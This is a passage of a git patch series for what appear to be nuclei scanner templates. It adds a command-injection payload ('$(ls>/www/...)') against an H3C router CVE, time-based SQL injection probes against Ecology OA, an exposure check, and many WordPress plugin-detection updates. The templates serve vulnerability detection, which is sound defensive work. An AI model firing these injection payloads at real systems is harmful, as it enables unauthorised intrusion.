From d6b90a70ae7b9669a8ff9a6674608ab2eb39168a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 31 Oct 2023 14:20:53 +0530 Subject: [PATCH 01/36] Create CVE-2023-33629.yaml --- http/cves/2023/CVE-2023-33629.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2023/CVE-2023-33629.yaml diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml new file mode 100644 index 0000000000..df27b2b498 --- /dev/null +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -0,0 +1,40 @@ +id: CVE-2023-33629 + +info: + name: H3C Magic R300-2100M - Remote Code Execution + author: DhiyaneshDK + severity: critical + description: | + H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-33629 + - https://hackmd.io/@0dayResearch/r1UjggZfh + metadata: + max-request: 1 + fofa-query: app="H3C-Ent-Router" + verified: true + tags: cve,cve2023,router,rce,h3c + +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /goform/aspForm HTTP/1.1 + Host: {{Hostname}} + + CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/{{filename}}); + + - | + GET /{{filename}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code_1 == 302 + - contains(body_1, 'do_cmd.asp') + - status_code_2 == 200 + - contains(body_2, 'www') && contains(body_2, 'www_multi') + condition: and From 0f9ea410fa47f929d74296fdac44ae81025e6303 Mon Sep 17 00:00:00 2001 From: J4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Tue, 31 Oct 2023 18:54:08 +0800 Subject: [PATCH 02/36] Update ecology-oa-file-sqli.yaml --- .../other/ecology-oa-file-sqli.yaml | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index 2d72ba3eed..17c641b7b2 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -23,14 +23,26 @@ http: Host: {{Hostname}} isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7' + - | + @timeout: 25s + POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 + Host: {{Hostname}} + isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:15' + + matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=7' - - 'status_code == 200' - - 'content_length == 0' - - 'contains(set_cookie, "ecology_JSessionid=")' + - 'duration_1>=7' + - 'status_code_1 == 200' + - 'contains(header_1, "ecology_JSessionid=")' condition: and + - type: dsl + dsl: + - 'duration_2>=15' + - 'status_code_2 == 200' + - 'contains(header_2, "ecology_JSessionid=")' + condition: and # digest: 4a0a004730450220706de22bcda877d015e3158b4912359fceab8b5c6888f625675921c48ebf595f022100baf7463de1956ebc43063ae318c3e1e9b4ee0e96dc1652136e8c0b3c68ae1978:922c64590222798bb761d5b6d8e72950 From 7c1515e431bf165f2623add882d5f6eb95aaa4d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Thu, 2 Nov 2023 13:44:23 +0100 Subject: [PATCH 03/36] searchreplacedb2 exposure --- .../searchreplacedb2-exposure.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/searchreplacedb2-exposure.yaml diff --git a/http/misconfiguration/searchreplacedb2-exposure.yaml b/http/misconfiguration/searchreplacedb2-exposure.yaml new file mode 100644 index 0000000000..ee6491888d --- /dev/null +++ b/http/misconfiguration/searchreplacedb2-exposure.yaml @@ -0,0 +1,32 @@ +id: searchreplacedb2-exposure + +info: + name: Safe Search Replace Exposure + author: kazet + severity: high + reference: + - https://interconnectit.com/search-and-replace-for-wordpress-databases/ + metadata: + verified: true + max-request: 1 + tags: misconfig,searchreplacedb2,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/searchreplacedb2.php" + + matchers-condition: and + matchers: + - type: word + words: + - "Search and replace DB." + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b2c5f2a02c4cc5bcb7ea68c372cb7473e274d197 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 Nov 2023 19:28:45 +0530 Subject: [PATCH 04/36] Update searchreplacedb2-exposure.yaml --- http/misconfiguration/searchreplacedb2-exposure.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/searchreplacedb2-exposure.yaml b/http/misconfiguration/searchreplacedb2-exposure.yaml index ee6491888d..e7d9b2d0db 100644 --- a/http/misconfiguration/searchreplacedb2-exposure.yaml +++ b/http/misconfiguration/searchreplacedb2-exposure.yaml @@ -6,9 +6,12 @@ info: severity: high reference: - https://interconnectit.com/search-and-replace-for-wordpress-databases/ + - https://github.com/interconnectit/Search-Replace-DB metadata: verified: true max-request: 1 + fofa-query: body="searchreplacedb2.php" + shodan-query: html:"searchreplacedb2.php" tags: misconfig,searchreplacedb2,exposure http: @@ -19,8 +22,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - - "Search and replace DB." + - "Database details" + - "Safe Search Replace" + condition: and - type: word part: header From a52fddc72afbac953603328d17919ddd1b6376ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 04:01:56 +0000 Subject: [PATCH 05/36] Auto WordPress Plugins Update [Fri Nov 3 04:01:56 UTC 2023] :robot: --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/better-wp-security.txt | 2 +- helpers/wordpress/plugins/host-webfonts-local.txt | 2 +- helpers/wordpress/plugins/limit-login-attempts-reloaded.txt | 2 +- helpers/wordpress/plugins/siteorigin-panels.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/wp-fastest-cache.txt | 2 +- helpers/wordpress/plugins/wp-seopress.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 4 +--- http/technologies/wordpress/plugins/add-to-any.yaml | 4 +--- http/technologies/wordpress/plugins/admin-menu-editor.yaml | 4 +--- .../wordpress/plugins/advanced-custom-fields.yaml | 4 +--- http/technologies/wordpress/plugins/akismet.yaml | 4 +--- .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 4 +--- http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 4 +--- .../wordpress/plugins/all-in-one-wp-migration.yaml | 4 +--- .../plugins/all-in-one-wp-security-and-firewall.yaml | 4 +--- http/technologies/wordpress/plugins/amp.yaml | 4 +--- http/technologies/wordpress/plugins/antispam-bee.yaml | 4 +--- http/technologies/wordpress/plugins/astra-sites.yaml | 4 +--- http/technologies/wordpress/plugins/astra-widgets.yaml | 4 +--- http/technologies/wordpress/plugins/autoptimize.yaml | 4 +--- http/technologies/wordpress/plugins/backwpup.yaml | 4 +--- .../technologies/wordpress/plugins/better-search-replace.yaml | 4 +--- http/technologies/wordpress/plugins/better-wp-security.yaml | 4 +--- .../wordpress/plugins/black-studio-tinymce-widget.yaml | 4 +--- http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 4 +--- http/technologies/wordpress/plugins/breeze.yaml | 4 +--- http/technologies/wordpress/plugins/broken-link-checker.yaml | 4 +--- .../wordpress/plugins/child-theme-configurator.yaml | 4 +--- http/technologies/wordpress/plugins/classic-editor.yaml | 4 +--- http/technologies/wordpress/plugins/classic-widgets.yaml | 4 +--- .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 4 +--- http/technologies/wordpress/plugins/cmb2.yaml | 4 +--- http/technologies/wordpress/plugins/coblocks.yaml | 4 +--- http/technologies/wordpress/plugins/code-snippets.yaml | 4 +--- http/technologies/wordpress/plugins/coming-soon.yaml | 4 +--- http/technologies/wordpress/plugins/complianz-gdpr.yaml | 4 +--- .../wordpress/plugins/contact-form-7-honeypot.yaml | 4 +--- http/technologies/wordpress/plugins/contact-form-7.yaml | 4 +--- http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 4 +--- http/technologies/wordpress/plugins/cookie-law-info.yaml | 4 +--- http/technologies/wordpress/plugins/cookie-notice.yaml | 4 +--- http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 4 +--- .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 4 +--- http/technologies/wordpress/plugins/custom-css-js.yaml | 4 +--- http/technologies/wordpress/plugins/custom-fonts.yaml | 4 +--- http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 4 +--- http/technologies/wordpress/plugins/disable-comments.yaml | 4 +--- http/technologies/wordpress/plugins/disable-gutenberg.yaml | 4 +--- http/technologies/wordpress/plugins/duplicate-page.yaml | 4 +--- http/technologies/wordpress/plugins/duplicate-post.yaml | 4 +--- http/technologies/wordpress/plugins/duplicator.yaml | 4 +--- .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 4 +--- http/technologies/wordpress/plugins/easy-fancybox.yaml | 4 +--- .../wordpress/plugins/easy-table-of-contents.yaml | 4 +--- http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 4 +--- http/technologies/wordpress/plugins/elementor.yaml | 4 +--- http/technologies/wordpress/plugins/elementskit-lite.yaml | 4 +--- http/technologies/wordpress/plugins/enable-media-replace.yaml | 4 +--- http/technologies/wordpress/plugins/envato-elements.yaml | 4 +--- .../plugins/essential-addons-for-elementor-lite.yaml | 4 +--- http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 4 +--- .../wordpress/plugins/facebook-for-woocommerce.yaml | 4 +--- http/technologies/wordpress/plugins/fast-indexing-api.yaml | 4 +--- .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 4 +--- http/technologies/wordpress/plugins/flamingo.yaml | 4 +--- http/technologies/wordpress/plugins/fluentform.yaml | 4 +--- http/technologies/wordpress/plugins/font-awesome.yaml | 4 +--- .../wordpress/plugins/force-regenerate-thumbnails.yaml | 4 +--- http/technologies/wordpress/plugins/formidable.yaml | 4 +--- http/technologies/wordpress/plugins/forminator.yaml | 4 +--- http/technologies/wordpress/plugins/ga-google-analytics.yaml | 4 +--- .../wordpress/plugins/gdpr-cookie-compliance.yaml | 4 +--- .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 4 +--- .../wordpress/plugins/google-analytics-for-wordpress.yaml | 4 +--- .../wordpress/plugins/google-listings-and-ads.yaml | 4 +--- http/technologies/wordpress/plugins/google-site-kit.yaml | 4 +--- .../wordpress/plugins/google-sitemap-generator.yaml | 4 +--- http/technologies/wordpress/plugins/gtranslate.yaml | 4 +--- http/technologies/wordpress/plugins/gutenberg.yaml | 4 +--- .../wordpress/plugins/happy-elementor-addons.yaml | 4 +--- .../wordpress/plugins/header-footer-code-manager.yaml | 4 +--- .../wordpress/plugins/header-footer-elementor.yaml | 4 +--- http/technologies/wordpress/plugins/header-footer.yaml | 4 +--- http/technologies/wordpress/plugins/health-check.yaml | 4 +--- http/technologies/wordpress/plugins/hello-dolly.yaml | 4 +--- http/technologies/wordpress/plugins/host-webfonts-local.yaml | 4 +--- http/technologies/wordpress/plugins/imagify.yaml | 4 +--- http/technologies/wordpress/plugins/imsanity.yaml | 4 +--- .../wordpress/plugins/insert-headers-and-footers.yaml | 4 +--- http/technologies/wordpress/plugins/instagram-feed.yaml | 4 +--- .../wordpress/plugins/intuitive-custom-post-order.yaml | 4 +--- http/technologies/wordpress/plugins/iwp-client.yaml | 4 +--- http/technologies/wordpress/plugins/jetpack-boost.yaml | 4 +--- http/technologies/wordpress/plugins/jetpack.yaml | 4 +--- http/technologies/wordpress/plugins/kadence-blocks.yaml | 4 +--- http/technologies/wordpress/plugins/kirki.yaml | 4 +--- http/technologies/wordpress/plugins/leadin.yaml | 4 +--- .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 4 +--- http/technologies/wordpress/plugins/limit-login-attempts.yaml | 4 +--- http/technologies/wordpress/plugins/litespeed-cache.yaml | 4 +--- http/technologies/wordpress/plugins/loco-translate.yaml | 4 +--- http/technologies/wordpress/plugins/loginizer.yaml | 4 +--- .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 4 +--- http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 4 +--- http/technologies/wordpress/plugins/mailpoet.yaml | 4 +--- http/technologies/wordpress/plugins/maintenance.yaml | 4 +--- http/technologies/wordpress/plugins/mainwp-child.yaml | 4 +--- http/technologies/wordpress/plugins/malcare-security.yaml | 4 +--- http/technologies/wordpress/plugins/megamenu.yaml | 4 +--- http/technologies/wordpress/plugins/members.yaml | 4 +--- http/technologies/wordpress/plugins/meta-box.yaml | 4 +--- http/technologies/wordpress/plugins/metform.yaml | 4 +--- http/technologies/wordpress/plugins/ml-slider.yaml | 4 +--- http/technologies/wordpress/plugins/newsletter.yaml | 4 +--- .../wordpress/plugins/nextend-facebook-connect.yaml | 4 +--- http/technologies/wordpress/plugins/nextgen-gallery.yaml | 4 +--- http/technologies/wordpress/plugins/ninja-forms.yaml | 4 +--- http/technologies/wordpress/plugins/ocean-extra.yaml | 4 +--- .../wordpress/plugins/official-facebook-pixel.yaml | 4 +--- .../technologies/wordpress/plugins/one-click-demo-import.yaml | 4 +--- http/technologies/wordpress/plugins/optinmonster.yaml | 4 +--- http/technologies/wordpress/plugins/otter-blocks.yaml | 4 +--- http/technologies/wordpress/plugins/password-protected.yaml | 4 +--- http/technologies/wordpress/plugins/pdf-embedder.yaml | 4 +--- .../wordpress/plugins/pinterest-for-woocommerce.yaml | 4 +--- http/technologies/wordpress/plugins/pixelyoursite.yaml | 4 +--- http/technologies/wordpress/plugins/polylang.yaml | 4 +--- http/technologies/wordpress/plugins/popup-builder.yaml | 4 +--- http/technologies/wordpress/plugins/popup-maker.yaml | 4 +--- http/technologies/wordpress/plugins/post-smtp.yaml | 4 +--- http/technologies/wordpress/plugins/post-types-order.yaml | 4 +--- .../wordpress/plugins/premium-addons-for-elementor.yaml | 4 +--- http/technologies/wordpress/plugins/pretty-link.yaml | 4 +--- .../technologies/wordpress/plugins/really-simple-captcha.yaml | 4 +--- http/technologies/wordpress/plugins/really-simple-ssl.yaml | 4 +--- http/technologies/wordpress/plugins/redirection.yaml | 4 +--- http/technologies/wordpress/plugins/redux-framework.yaml | 4 +--- .../technologies/wordpress/plugins/regenerate-thumbnails.yaml | 4 +--- http/technologies/wordpress/plugins/safe-svg.yaml | 4 +--- http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 4 +--- http/technologies/wordpress/plugins/sg-cachepress.yaml | 4 +--- http/technologies/wordpress/plugins/sg-security.yaml | 4 +--- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 4 +--- .../wordpress/plugins/shortpixel-image-optimiser.yaml | 4 +--- .../wordpress/plugins/simple-custom-post-order.yaml | 4 +--- http/technologies/wordpress/plugins/siteguard.yaml | 4 +--- http/technologies/wordpress/plugins/siteorigin-panels.yaml | 4 +--- http/technologies/wordpress/plugins/smart-slider-3.yaml | 4 +--- http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 4 +--- .../plugins/stops-core-theme-and-plugin-updates.yaml | 4 +--- http/technologies/wordpress/plugins/sucuri-scanner.yaml | 4 +--- http/technologies/wordpress/plugins/svg-support.yaml | 4 +--- .../wordpress/plugins/table-of-contents-plus.yaml | 4 +--- http/technologies/wordpress/plugins/tablepress.yaml | 4 +--- http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 4 +--- http/technologies/wordpress/plugins/the-events-calendar.yaml | 4 +--- http/technologies/wordpress/plugins/tinymce-advanced.yaml | 4 +--- .../wordpress/plugins/translatepress-multilingual.yaml | 4 +--- .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 4 +--- .../wordpress/plugins/under-construction-page.yaml | 4 +--- http/technologies/wordpress/plugins/updraftplus.yaml | 4 +--- http/technologies/wordpress/plugins/use-any-font.yaml | 4 +--- http/technologies/wordpress/plugins/user-role-editor.yaml | 4 +--- .../wordpress/plugins/velvet-blues-update-urls.yaml | 4 +--- http/technologies/wordpress/plugins/w3-total-cache.yaml | 4 +--- .../wordpress/plugins/webp-converter-for-media.yaml | 4 +--- http/technologies/wordpress/plugins/webp-express.yaml | 4 +--- .../wordpress/plugins/widget-importer-exporter.yaml | 4 +--- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 4 +--- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 4 +--- .../wordpress/plugins/woo-variation-swatches.yaml | 4 +--- .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 4 +--- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 4 +--- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 4 +--- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 4 +--- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 4 +--- http/technologies/wordpress/plugins/woocommerce-services.yaml | 4 +--- http/technologies/wordpress/plugins/woocommerce.yaml | 4 +--- http/technologies/wordpress/plugins/wordfence.yaml | 4 +--- http/technologies/wordpress/plugins/wordpress-importer.yaml | 4 +--- http/technologies/wordpress/plugins/wordpress-seo.yaml | 4 +--- http/technologies/wordpress/plugins/worker.yaml | 4 +--- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 4 +--- http/technologies/wordpress/plugins/wp-file-manager.yaml | 4 +--- http/technologies/wordpress/plugins/wp-google-maps.yaml | 4 +--- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 4 +--- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 4 +--- http/technologies/wordpress/plugins/wp-migrate-db.yaml | 4 +--- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 4 +--- http/technologies/wordpress/plugins/wp-optimize.yaml | 4 +--- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 4 +--- http/technologies/wordpress/plugins/wp-reset.yaml | 4 +--- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 4 +--- http/technologies/wordpress/plugins/wp-rollback.yaml | 4 +--- http/technologies/wordpress/plugins/wp-seopress.yaml | 4 +--- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 4 +--- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- http/technologies/wordpress/plugins/wp-statistics.yaml | 4 +--- http/technologies/wordpress/plugins/wp-super-cache.yaml | 4 +--- http/technologies/wordpress/plugins/wp-user-avatar.yaml | 4 +--- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 4 +--- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 4 +--- http/technologies/wordpress/plugins/wpforms-lite.yaml | 4 +--- http/technologies/wordpress/plugins/wps-hide-login.yaml | 4 +--- .../technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 4 +--- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 4 +--- 208 files changed, 208 insertions(+), 607 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 5141b615b4..3ec370e154 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.4.4 \ No newline at end of file +3.4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt index f202cd983c..8e055f7721 100644 --- a/helpers/wordpress/plugins/better-wp-security.txt +++ b/helpers/wordpress/plugins/better-wp-security.txt @@ -1 +1 @@ -9.0.2 \ No newline at end of file +9.0.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index 4b1e48ed97..72cf891338 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.7.4 \ No newline at end of file +5.7.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index a244f263f3..8cc9d87867 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.25 \ No newline at end of file +2.25.26 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index cd74b3e810..295b40e7f7 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.26.2 \ No newline at end of file +2.27.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index b370e25daa..fae692e41d 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.1.8 \ No newline at end of file +2.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt index 867e52437a..cb174d58a5 100644 --- a/helpers/wordpress/plugins/wp-fastest-cache.txt +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -1 +1 @@ -1.2.0 \ No newline at end of file +1.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt index ef09838cb2..0e7b60da8a 100644 --- a/helpers/wordpress/plugins/wp-seopress.txt +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -1 +1 @@ -7.1.1 \ No newline at end of file +7.1.2 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index e777543d8a..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a22bbea463b2e201e77cf8726ddf489645524c70523140e1272a6fc4083e99db022100909f1fb99b4fcc1c2d3ca14868572f78eeb330f88960fb3c6fe2f1044f9bb332:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 614461c978..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bc8b3d27d897223a60881143f483c757e21234577abede98b9e90869bfd7ce9e02207f6865b8c66439cbd2b0381a0e0724481d6e379dacbf8d22de54fe35aab54e57:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 92bcd285da..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220740d74468a014762b02ce8bf56f3a261f57a793e571f94021feebd9ad4a2208e02203036d6c0a3b5c029fd6c2f1c56cc4b1e371857d0314bbecf9be84bd8368706c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 72edb13aaa..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022071b79b66d9d398361d6696df6fb22fcc3973e62c098018544cf4ecbbabbf2d7a0221009be7e82626ecf56f21eb28cd49791ac38bdf45a226658372834ebe6867f65b86:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 54637ecc39..f68ad2a6bf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207af9f6ace60f35d5320b01e86aa6899390d8c3d1ce1c7db76a0306e7a126e25b022100e9f1b094703965c1c0c159a2247f060d35e034b1b965316249ffab4affee89d6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index a5b4d4a4e3..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022100f862cdc542d5ef4530994b4bc83ac32a51f61d1cc6e03ad6eef32a837a3448b5021f31bdfd91589cff3bd2003af9ebca0d94e8f22b956adb5712208e0e0c9ecd21:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 5c59cd33c7..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022065a2a949247e8a232995d600ae2f678b0790d9d1ddac9f45c69acf360a73d5f602200d25fc72428fb0c33a141d0dcef1553d04b883134a3ce2df293c9c23335e4ee3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 29f7b097c3..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" @@ -47,5 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203305a9094402505342af36de4aa006977984a5ea4274c56b9670ba51a12c694402204b13d03174f48d6fe39485fc4985ba994487e0627e06bd9eb84ef6d467b10da4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 